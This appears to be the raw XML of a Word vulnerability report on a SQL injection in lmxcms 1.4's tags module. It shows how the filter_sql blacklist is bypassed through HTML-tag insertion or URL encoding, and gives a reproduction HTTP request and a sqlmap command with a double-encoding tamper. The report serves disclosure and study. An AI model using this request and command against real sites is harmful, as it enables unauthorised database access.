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9583" w14:textId="382C8E13" w:rsidR="007F42F9" w:rsidRDefault="00965D06" w:rsidP="002941D8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00965D06">
        <w:t>lmxcms1.4 Frontend SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B60EF5" w14:textId="18882B7B" w:rsidR="00043E65" w:rsidRDefault="00965D06" w:rsidP="00043E65">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00965D06">
        <w:t>Vulnerability Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A764680" w14:textId="27CC4D9F" w:rsidR="002941D8" w:rsidRDefault="00965D06">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00965D06">
        <w:t>Tagaction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00965D06">
        <w:t xml:space="preserve"> class will call the p function to pre-process the SQL before processing the SQL statement, then remove the html tags in the SQL, and finally perform </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00965D06">
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00965D06">
        <w:t xml:space="preserve"> decoding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3983C2AD" w14:textId="76CA7EFA" w:rsidR="00043E65" w:rsidRDefault="00043E65">
      <w:r w:rsidRPr="00043E65">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50A50E31" wp14:editId="0998BDCF">
            <wp:extent cx="5274310" cy="475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29B1" w14:textId="144ADCB7" w:rsidR="00043E65" w:rsidRDefault="00043E65">
      <w:r w:rsidRPr="00043E65">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17021E51" wp14:editId="04DDC220">
            <wp:extent cx="5274310" cy="2024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A9D0" w14:textId="18BB12FF" w:rsidR="002941D8" w:rsidRPr="003D2DB5" w:rsidRDefault="00965D06">
      <w:r w:rsidRPr="00965D06">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">When processing SQL statements, the backend will first call the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00965D06">
        <w:t>filter_sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00965D06">
        <w:t xml:space="preserve"> method to filter the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00965D06">
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00965D06">
        <w:t xml:space="preserve"> expectation once, by tracing the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00965D06">
        <w:t>filter_sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00965D06">
        <w:t xml:space="preserve"> method to find the blacklist mechanism used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD039ED" w14:textId="1E05C64C" w:rsidR="003D2DB5" w:rsidRDefault="003D2DB5">
      <w:r w:rsidRPr="003D2DB5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E95150B" wp14:editId="0E9C8142">
            <wp:extent cx="5274310" cy="5464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C519" w14:textId="4E6431BD" w:rsidR="003D2DB5" w:rsidRDefault="003D2DB5">
      <w:r w:rsidRPr="003D2DB5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74D4F1C7" wp14:editId="66264314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8911" w14:textId="11137EF8" w:rsidR="003D2DB5" w:rsidRDefault="003D2DB5"/>
    <w:p w14:paraId="33FAAA77" w14:textId="1CC04902" w:rsidR="00043E65" w:rsidRDefault="00965D06">
      <w:r w:rsidRPr="00965D06">
        <w:t xml:space="preserve">In this way, it is possible to bypass the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00965D06">
        <w:t>filter_sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00965D06">
        <w:t xml:space="preserve"> mechanism by inserting html tags (se&lt;&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00965D06">
        <w:t>lect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00965D06">
        <w:t xml:space="preserve">) or by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00965D06">
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00965D06">
        <w:t xml:space="preserve"> encoding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E105F8" w14:textId="471F3C37" w:rsidR="00043E65" w:rsidRDefault="00965D06" w:rsidP="00043E65">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00965D06">
        <w:lastRenderedPageBreak/>
        <w:t>Vulnerability recurrence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AF9EE9" w14:textId="5526E6F5" w:rsidR="002941D8" w:rsidRDefault="003D2DB5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Request：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571A828B" w14:textId="77777777" w:rsidR="003D2DB5" w:rsidRDefault="003D2DB5" w:rsidP="003D2DB5">
      <w:r>
        <w:t>GET /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lmxcms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>index.php?m</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tags&amp;a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>index&amp;name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=1 HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0EE4E4" w14:textId="77777777" w:rsidR="003D2DB5" w:rsidRDefault="003D2DB5" w:rsidP="003D2DB5">
      <w:r>
        <w:t>Host: 192.168.240.132</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696FC2DC" w14:textId="77777777" w:rsidR="003D2DB5" w:rsidRDefault="003D2DB5" w:rsidP="003D2DB5">
      <w:r>
        <w:t>Upgrade-Insecure-Requests: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F936F6C" w14:textId="77777777" w:rsidR="003D2DB5" w:rsidRDefault="003D2DB5" w:rsidP="003D2DB5"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Chrome/91.0.4472.106 Safari/537.36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56268BF4" w14:textId="77777777" w:rsidR="003D2DB5" w:rsidRDefault="003D2DB5" w:rsidP="003D2DB5">
      <w:r>
        <w:t>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD3E416" w14:textId="77777777" w:rsidR="003D2DB5" w:rsidRDefault="003D2DB5" w:rsidP="003D2DB5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1EE1EEAB" w14:textId="77777777" w:rsidR="003D2DB5" w:rsidRDefault="003D2DB5" w:rsidP="003D2DB5">
      <w:r>
        <w:t xml:space="preserve">Accept-Language: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zh-CN,zh;q</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=0.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50773685" w14:textId="54EF5491" w:rsidR="003D2DB5" w:rsidRDefault="003D2DB5">
      <w:r>
        <w:t>Connection: close</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8C13A4" w14:textId="6EB6A274" w:rsidR="003D2DB5" w:rsidRDefault="003D2DB5"/>
    <w:p w14:paraId="6F8327A9" w14:textId="1CD5E9CD" w:rsidR="00043E65" w:rsidRDefault="00043E65">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>qlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00965D06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECB9B0E" w14:textId="39B2E743" w:rsidR="00043E65" w:rsidRDefault="00043E65">
      <w:r w:rsidRPr="00043E65">
        <w:t>python3.exe .\sqlmap.py -r .\payload\req.txt --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00043E65">
        <w:t>dbms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00043E65">
        <w:t>="MySQL" --technique=U -v3 --tamper=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00043E65">
        <w:t>chardoubleencode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00043E65">
        <w:t xml:space="preserve"> -p name --batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6086BB8B" w14:textId="77777777" w:rsidR="00043E65" w:rsidRDefault="00043E65"/>
    <w:p w14:paraId="6C885DB2" w14:textId="7BE3F37B" w:rsidR="003D2DB5" w:rsidRDefault="00965D06">
      <w:r w:rsidRPr="00965D06">
        <w:t>The name parameter is vulnerable to injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53267DB7" w14:textId="26067595" w:rsidR="002941D8" w:rsidRDefault="003D2DB5">
      <w:r w:rsidRPr="003D2DB5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60D9AA19" wp14:editId="339B4042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214" w14:textId="5D675ECA" w:rsidR="002941D8" w:rsidRDefault="00043E65">
      <w:r w:rsidRPr="00043E65">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61AC54F4" wp14:editId="2B441239">
            <wp:extent cx="4496427" cy="172426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F286" w14:textId="77777777" w:rsidR="002941D8" w:rsidRDefault="002941D8"/>
    <w:sectPr w:rsidR="0029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D8"/>
    <w:rsid w:val="00043E65"/>
    <w:rsid w:val="002941D8"/>
    <w:rsid w:val="003D2DB5"/>
    <w:rsid w:val="007F42F9"/>
    <w:rsid w:val="009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DD88"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6377FC79-B03E-4572-8230-D0308A7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4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E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4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E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Wang</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Karson Wang</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-06-18T02:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-06-18T04:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>